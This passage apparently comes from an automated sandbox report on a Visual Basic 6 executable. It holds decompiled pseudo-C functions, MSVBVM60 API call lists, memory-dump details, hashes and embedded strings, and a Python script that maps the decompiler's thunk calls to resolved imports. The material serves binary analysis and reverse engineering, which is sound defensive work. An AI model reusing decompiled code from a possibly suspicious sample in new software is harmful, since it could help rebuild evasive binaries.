          						_v264 = 0x41c614;
          					}
          					_v180 =  *_v264;
          					_t275 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
          					asm("fclex");
          					_v184 = _t275;
          					if(_v184 >= 0) {
          						_v268 = _v268 & 0x00000000;
          					} else {
          						_push(0x14);
          						_push(0x402e80);
          						_push(_v180);
          						_push(_v184);
          						L00401352();
          						_v268 = _t275;
          					}
          					_v188 = _v76;
          					_t280 =  *((intOrPtr*)( *_v188 + 0xc8))(_v188,  &_v176);
          					asm("fclex");
          					_v192 = _t280;
          					if(_v192 >= 0) {
          						_v272 = _v272 & 0x00000000;
          					} else {
          						_push(0xc8);
          						_push(0x402ea0);
          						_push(_v188);
          						_push(_v192);
          						L00401352();
          						_v272 = _t280;
          					}
          					_v60 = _v176;
          					L0040132E();
          					_v276 =  *0x401180 *  *0x401178;
          					 *_t331 = _v276;
          					_t284 =  *((intOrPtr*)( *_a4 + 0x84))(_a4,  &_v76);
          					asm("fclex");
          					_v180 = _t284;
          					if(_v180 >= 0) {
          						_v280 = _v280 & 0x00000000;
          					} else {
          						_push(0x84);
          						_push(0x402cc8);
          						_push(_a4);
          						_push(_v180);
          						L00401352();
          						_v280 = _t284;
          					}
          				}
          				_t235 =  &_v92;
          				_push(_t235);
          				L004012B0();
          				L004012B6();
          				asm("wait");
          				_push(0x41a1f1);
          				L0040132E();
          				L00401334();
          				L00401310();
          				L00401310();
          				return _t235;
          			}

          Per-line addresses for the decompiled function above: 0x00419a95 to 0x0041a1f0 (address column of the C-code view).

          APIs
          • __vbaChkstk.MSVBVM60(?,004011C6), ref: 00419AB0
          • __vbaVarDup.MSVBVM60 ref: 00419AEE
          • #564.MSVBVM60(?,?), ref: 00419AFB
          • __vbaHresultCheck.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00419B15
          • __vbaVarTstNe.MSVBVM60(00008002,?), ref: 00419B48
          • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?), ref: 00419B5E
          • #554.MSVBVM60(?,?,004011C6), ref: 00419B75
          • __vbaNew2.MSVBVM60(00402E90,0041C614,?,?,004011C6), ref: 00419B8D
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 00419BEF
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,00000058), ref: 00419C45
          • __vbaStrMove.MSVBVM60(00000000,?,00402EA0,00000058), ref: 00419C6F
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,00000058), ref: 00419C77
          • #680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00419CCB
          • __vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00419CE1
          • #554.MSVBVM60(?,?,?,?,?,?,004011C6), ref: 00419CE9
          • #716.MSVBVM60(?,Feverroot3,00000000,?,?,?,?,?,?,004011C6), ref: 00419CF9
          • __vbaChkstk.MSVBVM60(?,Feverroot3,00000000,?,?,?,?,?,?,004011C6), ref: 00419D01
          • __vbaLateIdSt.MSVBVM60(?,00000000,?,Feverroot3,00000000,?,?,?,?,?,?,004011C6), ref: 00419D14
          • __vbaFreeVar.MSVBVM60(?,00000000,?,Feverroot3,00000000,?,?,?,?,?,?,004011C6), ref: 00419D1C
          • __vbaInStrB.MSVBVM60(00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 00419D2F
          • __vbaNew2.MSVBVM60(00402E90,0041C614,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 00419D50
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 00419DB2
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,00000138), ref: 00419E11
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,00000138), ref: 00419E28
          • __vbaNew2.MSVBVM60(00402E90,0041C614), ref: 00419E40
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 00419EA2
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,00000130), ref: 00419EFE
          • __vbaStrMove.MSVBVM60(00000000,?,00402EA0,00000130), ref: 00419F28
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,00000130), ref: 00419F30
          • __vbaNew2.MSVBVM60(00402E90,0041C614), ref: 00419F48
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 00419FAA
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,000000C0), ref: 0041A009
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,000000C0), ref: 0041A02B
          • __vbaNew2.MSVBVM60(00402E90,0041C614), ref: 0041A043
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 0041A0A5
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,000000C8), ref: 0041A104
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,000000C8), ref: 0041A126
          • __vbaHresultCheckObj.MSVBVM60(00000000,00401188,00402CC8,00000084), ref: 0041A179
          • #546.MSVBVM60(?,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 0041A191
          • __vbaVarMove.MSVBVM60(?,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 0041A19C
          • __vbaFreeObj.MSVBVM60(0041A1F1,?,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 0041A1D3
          • __vbaFreeVar.MSVBVM60(0041A1F1,?,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 0041A1DB
          • __vbaFreeStr.MSVBVM60(0041A1F1,?,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 0041A1E3
          • __vbaFreeStr.MSVBVM60(0041A1F1,?,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 0041A1EB
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692270071.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000006.00000002.692260307.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000006.00000002.692368714.000000000041C000.00000004.00020000.sdmp
          • Associated: 00000006.00000002.692383099.000000000041F000.00000004.00020000.sdmp
          • Associated: 00000006.00000002.692403050.0000000000421000.00000002.00020000.sdmp
          Similarity
          • API ID: __vba$CheckFreeHresult$New2$Move$#554ChkstkList$#546#564#680#716Late
          • String ID: ABC$Feverroot3$Morwong4
          • API String ID: 4004030552-2891085420
          • Opcode ID: 88231f88e667e75d79acfb9431c71f58575902691dcb01c164aea49134dcd594
          • Instruction ID: f7546308219a1e6bce983f229d6136b28cc7180134ed01ebb483c6112b8f535f
          • Opcode Fuzzy Hash: 88231f88e667e75d79acfb9431c71f58575902691dcb01c164aea49134dcd594
          • Instruction Fuzzy Hash: AA12C370940228EFDB21DF90CD85BDDBBB6BB04305F1040EAE509B62A1D7785AC9DF5A
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 55%
          			E0041975B(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				char _v28;
          				intOrPtr _v32;
          				char _v36;
          				void* _v40;
          				long long _v48;
          				signed int _v52;
          				signed int _v56;
          				char _v64;
          				char _v72;
          				char _v80;
          				char _v88;
          				char _v96;
          				char _v104;
          				intOrPtr _v112;
          				intOrPtr _v120;
          				intOrPtr* _v156;
          				signed int _v160;
          				intOrPtr* _v164;
          				signed int _v168;
          				signed int _v180;
          				signed int _v184;
          				intOrPtr* _v188;
          				signed int _v192;
          				signed int _v196;
          				intOrPtr* _v200;
          				signed int _v204;
          				char* _t92;
          				signed int _t98;
          				signed int _t103;
          				signed int _t118;
          				char* _t127;
          				void* _t134;
          				void* _t136;
          				intOrPtr _t137;
          				long long _t146;
          				long long _t147;
          
          				_t137 = _t136 - 0xc;
          				 *[fs:0x0] = _t137;                                   // install the VB6 SEH frame
          				L004011C0();                                          // 0x00419779: __vbaChkstk
          				_v16 = _t137;
          				_v12 = 0x401168;
          				_v8 = 0;
          				_t92 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011c6, _t134);  // vtable slot 1: AddRef on the object argument (Me)
          				_t146 =  *0x401160;
          				L0040123E();                                          // 0x004197A3: _CIsqrt
          				L0040130A();                                          // 0x004197A8: __vbaFpR8
          				asm("fcomp qword [0x401158]");                        // compare the sqrt result with the double constant at 0x401158
          				asm("fnstsw ax");
          				asm("sahf");
          				if(__eflags != 0) {                                   // branch on that floating-point compare
          					if( *0x41c614 != 0) {
          						_v188 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();                                      // 0x004197CF: __vbaNew2, lazily creates the global object at 0x41c614
          						_v188 = 0x41c614;
          					}
          					_v156 =  *_v188;
          					_t98 =  *((intOrPtr*)( *_v156 + 0x14))(_v156,  &_v56);  // COM call, vtable offset 0x14, object out-parameter
          					asm("fclex");
          					_v160 = _t98;
          					if(_v160 >= 0) {
          						_t20 =  &_v192;
          						 *_t20 = _v192 & 0x00000000;
          						__eflags =  *_t20;
          					} else {
          						_push(0x14);
          						_push(0x402e80);
          						_push(_v156);
          						_push(_v160);
          						L00401352();                                      // 0x00419831: __vbaHresultCheckObj, raises a VB error for a failed HRESULT
          						_v192 = _t98;
          					}
          					_v164 = _v56;
          					_t103 =  *((intOrPtr*)( *_v164 + 0x110))(_v164,  &_v52);  // COM call, vtable offset 0x110, string out-parameter
          					asm("fclex");
          					_v168 = _t103;
          					if(_v168 >= 0) {
          						_t33 =  &_v196;
          						 *_t33 = _v196 & 0x00000000;
          						__eflags =  *_t33;
          					} else {
          						_push(0x110);
          						_push(0x402ea0);
          						_push(_v164);
          						_push(_v168);
          						L00401352();                                      // 0x0041988D: __vbaHresultCheckObj
          						_v196 = _t103;
          					}
          					_v180 = _v52;
          					_v52 = _v52 & 0x00000000;
          					L00401322();                                          // 0x004198B7: __vbaStrMove
          					L0040132E();                                          // 0x004198BF: __vbaFreeObj
          					_v64 = 0x80020004;                                    // Variant {vt = VT_ERROR (0xA), scode = DISP_E_PARAMNOTFOUND}: an omitted optional argument
          					_v72 = 0xa;
          					_push( &_v72);
          					L004012FE();                                          // 0x004198D6: MSVBVM60 ordinal #593
          					_v32 = _t146;
          					L00401334();                                          // 0x004198E1: __vbaFreeVar
          					L004012F8();                                          // 0x004198E6: MSVBVM60 ordinal #611
          					_t127 =  &_v36;
          					L00401322();                                          // 0x004198F0: __vbaStrMove
          					_v96 = 0x80020004;                                    // three more "missing" Variants, later passed to ordinal #680
          					_v104 = 0xa;
          					_v80 = 0x80020004;
          					_v88 = 0xa;
          					_v64 = 0x80020004;
          					_v72 = 0xa;
          					_push( &_v104);
          					_push( &_v88);
          					_push( &_v72);
          					_t147 =  *0x401150;
          					_push(_t127);
          					_push(_t127);
          					_v80 = _t147;
          					asm("fld1");
          					_push(_t127);
          					_push(_t127);
          					_v88 = _t147;
          					asm("fld1");
          					_push(_t127);
          					_push(_t127);
          					_v96 = _t147;
          					L004012F2();                                          // 0x00419944: MSVBVM60 ordinal #680
          					_v48 = _t147;
          					_push( &_v104);
          					_push( &_v88);
          					_push( &_v72);
          					_push(3);
          					L004012EC();                                          // 0x0041995A: __vbaFreeVarList(3, ...)
          					if( *0x41c614 != 0) {
          						_v200 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();                                      // 0x00419975: __vbaNew2
          						_v200 = 0x41c614;
          					}
          					_v156 =  *_v200;
          					_v112 = 0x8f;                                         // Variant {vt = VT_I2 (2), value = 0x8f}
          					_v120 = 2;
          					L004011C0();                                          // 0x004199B8: __vbaChkstk
          					asm("movsd");                                         // four movsd: copy the 16-byte Variant onto the stack as a by-value argument
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_t118 =  *((intOrPtr*)( *_v156 + 0x34))(_v156, 0x10, 0x6729,  &_v56);  // COM call, vtable offset 0x34, object out-parameter
          					asm("fclex");
          					_v160 = _t118;
          					if(_v160 >= 0) {
          						_t77 =  &_v204;
          						 *_t77 = _v204 & 0x00000000;
          						__eflags =  *_t77;
          					} else {
          						_push(0x34);
          						_push(0x402e80);
          						_push(_v156);
          						_push(_v160);
          						L00401352();                                      // 0x004199FB: __vbaHresultCheckObj
          						_v204 = _t118;
          					}
          					_v184 = _v56;
          					_v56 = _v56 & 0x00000000;
          					_push(_v184);
          					_t92 =  &_v28;
          					_push(_t92);
          					L004012E6();                                          // 0x00419A26: __vbaObjSet
          				}
          				asm("wait");
          				_push(0x419a73);
          				L0040132E();                                          // 0x00419A5D: __vbaFreeObj
          				L00401310();                                          // 0x00419A65: __vbaFreeStr
          				L00401310();                                          // 0x00419A6D: __vbaFreeStr
          				return _t92;
          			}

          Per-line addresses for E0041975B: 0x0041975e to 0x00419a72 (address column of the C-code view).

          APIs
          • __vbaChkstk.MSVBVM60(?,004011C6), ref: 00419779
          • _CIsqrt.MSVBVM60(?,?,?,?,004011C6), ref: 004197A3
          • __vbaFpR8.MSVBVM60(?,?,?,?,004011C6), ref: 004197A8
          • __vbaNew2.MSVBVM60(00402E90,0041C614,?,?,?,?,004011C6), ref: 004197CF
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 00419831
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,00000110), ref: 0041988D
          • __vbaStrMove.MSVBVM60(00000000,?,00402EA0,00000110), ref: 004198B7
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,00000110), ref: 004198BF
          • #593.MSVBVM60(0000000A), ref: 004198D6
          • __vbaFreeVar.MSVBVM60(0000000A), ref: 004198E1
          • #611.MSVBVM60(0000000A), ref: 004198E6
          • __vbaStrMove.MSVBVM60(0000000A), ref: 004198F0
          • #680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A,0000000A), ref: 00419944
          • __vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A,0000000A), ref: 0041995A
          • __vbaNew2.MSVBVM60(00402E90,0041C614,?,?,?,004011C6), ref: 00419975
          • __vbaChkstk.MSVBVM60(00006729,?), ref: 004199B8
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000034), ref: 004199FB
          • __vbaObjSet.MSVBVM60(?,?), ref: 00419A26
          • __vbaFreeObj.MSVBVM60(00419A73,?,?,?,?,004011C6), ref: 00419A5D
          • __vbaFreeStr.MSVBVM60(00419A73,?,?,?,?,004011C6), ref: 00419A65
          • __vbaFreeStr.MSVBVM60(00419A73,?,?,?,?,004011C6), ref: 00419A6D
          Memory Dump Source
          • Source File: 00000006.00000002.692270071.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000006.00000002.692260307.0000000000400000.00000002.00020000.sdmp
          • Associated: 00000006.00000002.692368714.000000000041C000.00000004.00020000.sdmp
          • Associated: 00000006.00000002.692383099.000000000041F000.00000004.00020000.sdmp
          • Associated: 00000006.00000002.692403050.0000000000421000.00000002.00020000.sdmp
          Similarity
          • API ID: __vba$Free$CheckHresult$ChkstkMoveNew2$#593#611#680IsqrtList
          • String ID:
          • API String ID: 3995339711-0
          • Opcode ID: 2c572e9ddfdfe6eb02bb0ecc0ec81cdc16a9161bac76e999c63f0f7c7c0aed8b
          • Instruction ID: 9d98c09c2021edddc1d2844ddb5ec905830acd095d3dbc7fc42b68673dcb94df
          • Opcode Fuzzy Hash: 2c572e9ddfdfe6eb02bb0ecc0ec81cdc16a9161bac76e999c63f0f7c7c0aed8b
          • Instruction Fuzzy Hash: E7811770910218EFDB10EFA1CD86BDDB7B5BF05304F1040AAE509BB2A1C7795A88CF59
          Uniqueness

          Uniqueness Score: -1.00%
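The decompiled functions above call MSVBVM60 only through thunks such as L00401304(), while the "APIs" lists give the resolved import per call-site address, and the address column gives one address per C line. Joining the two resolves every thunk. The script below is an added example and not part of the Joe Sandbox report; its function names (parse_api_refs, thunk_map, annotate) are its own, and its input is a handful of bullets and address/line pairs copied from the E0041975B entry above, embedded as constructed sample data. It assumes the layout shown on this page: the address of a thunk-call line equals the "ref" address of that call.

```python
import re

# One bullet of a Joe Sandbox "APIs" list, e.g.
#   • __vbaNew2.MSVBVM60(00402E90,0041C614), ref: 004197CF
API_RE = re.compile(
    r"^\s*•\s*(?P<name>#\d+|[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# A decompiler thunk call such as L00401304();
THUNK_RE = re.compile(r"\bL([0-9A-F]{8})\(\)")

# Constructed input: bullets copied from the "APIs" list of E0041975B.
API_LINES = """\
• __vbaChkstk.MSVBVM60(?,004011C6), ref: 00419779
• _CIsqrt.MSVBVM60(?,?,?,?,004011C6), ref: 004197A3
• __vbaFpR8.MSVBVM60(?,?,?,?,004011C6), ref: 004197A8
• __vbaNew2.MSVBVM60(00402E90,0041C614,?,?,?,?,004011C6), ref: 004197CF
• __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 00419831
• #593.MSVBVM60(0000000A), ref: 004198D6
• __vbaNew2.MSVBVM60(00402E90,0041C614,?,?,?,004011C6), ref: 00419975
""".splitlines()

# Constructed input: the address column zipped with the C-code lines it belongs to.
DECOMPILED = [
    ("0041975e", "_t137 = _t136 - 0xc;"),
    ("00419779", "L004011C0();"),
    ("004197a3", "L0040123E();"),
    ("004197a8", "L0040130A();"),
    ("004197cf", "L00401304();"),
    ("00419831", "L00401352();"),
    ("004198d6", "L004012FE();"),
    ("00419975", "L00401304();"),
]


def parse_api_refs(lines):
    """Map each call-site address to the import it resolves to and its observed arguments."""
    refs = {}
    for line in lines:
        m = API_RE.match(line)
        if not m:
            continue  # not an API bullet (headers, memory-dump lines, ...)
        args = m.group("args").split(",") if m.group("args") else []
        refs[int(m.group("ref"), 16)] = {
            "name": m.group("name"),
            "module": m.group("module"),
            "args": args,
        }
    return refs


def thunk_map(refs, decompiled):
    """Learn which import each Lxxxxxxxx thunk stands for by joining on the call address.

    A thunk must always resolve to the same import; a mismatch means the address
    column and the C code are misaligned, so refuse rather than mislabel a call.
    """
    mapping = {}
    for addr, code in decompiled:
        m = THUNK_RE.search(code)
        ref = refs.get(int(addr, 16))
        if m is None or ref is None:
            continue
        thunk = "L" + m.group(1)
        name = f"{ref['name']}.{ref['module']}"
        if mapping.get(thunk, name) != name:
            raise ValueError(f"{thunk} resolves to both {mapping[thunk]} and {name}")
        mapping[thunk] = name
    return mapping


def annotate(decompiled, refs):
    """Return the decompiled lines with the resolved import appended as a comment."""
    out = []
    for addr, code in decompiled:
        ref = refs.get(int(addr, 16))
        if ref is not None and THUNK_RE.search(code):
            code = f"{code}  // 0x{addr}: {ref['name']}.{ref['module']}"
        out.append(code)
    return out


if __name__ == "__main__":
    refs = parse_api_refs(API_LINES)
    for thunk, name in sorted(thunk_map(refs, DECOMPILED).items()):
        print(f"{thunk} -> {name}")
    print("\n".join(annotate(DECOMPILED, refs)))
```

Run over the full report, the thunk table learned from one function carries over to every other function in the same dump (the thunks live in the .text import stub area at 0x4011C0-0x401352), so a function whose "APIs" list is incomplete can still be read; the consistency check in thunk_map is what keeps a copy-paste misalignment of the address column from silently relabelling calls.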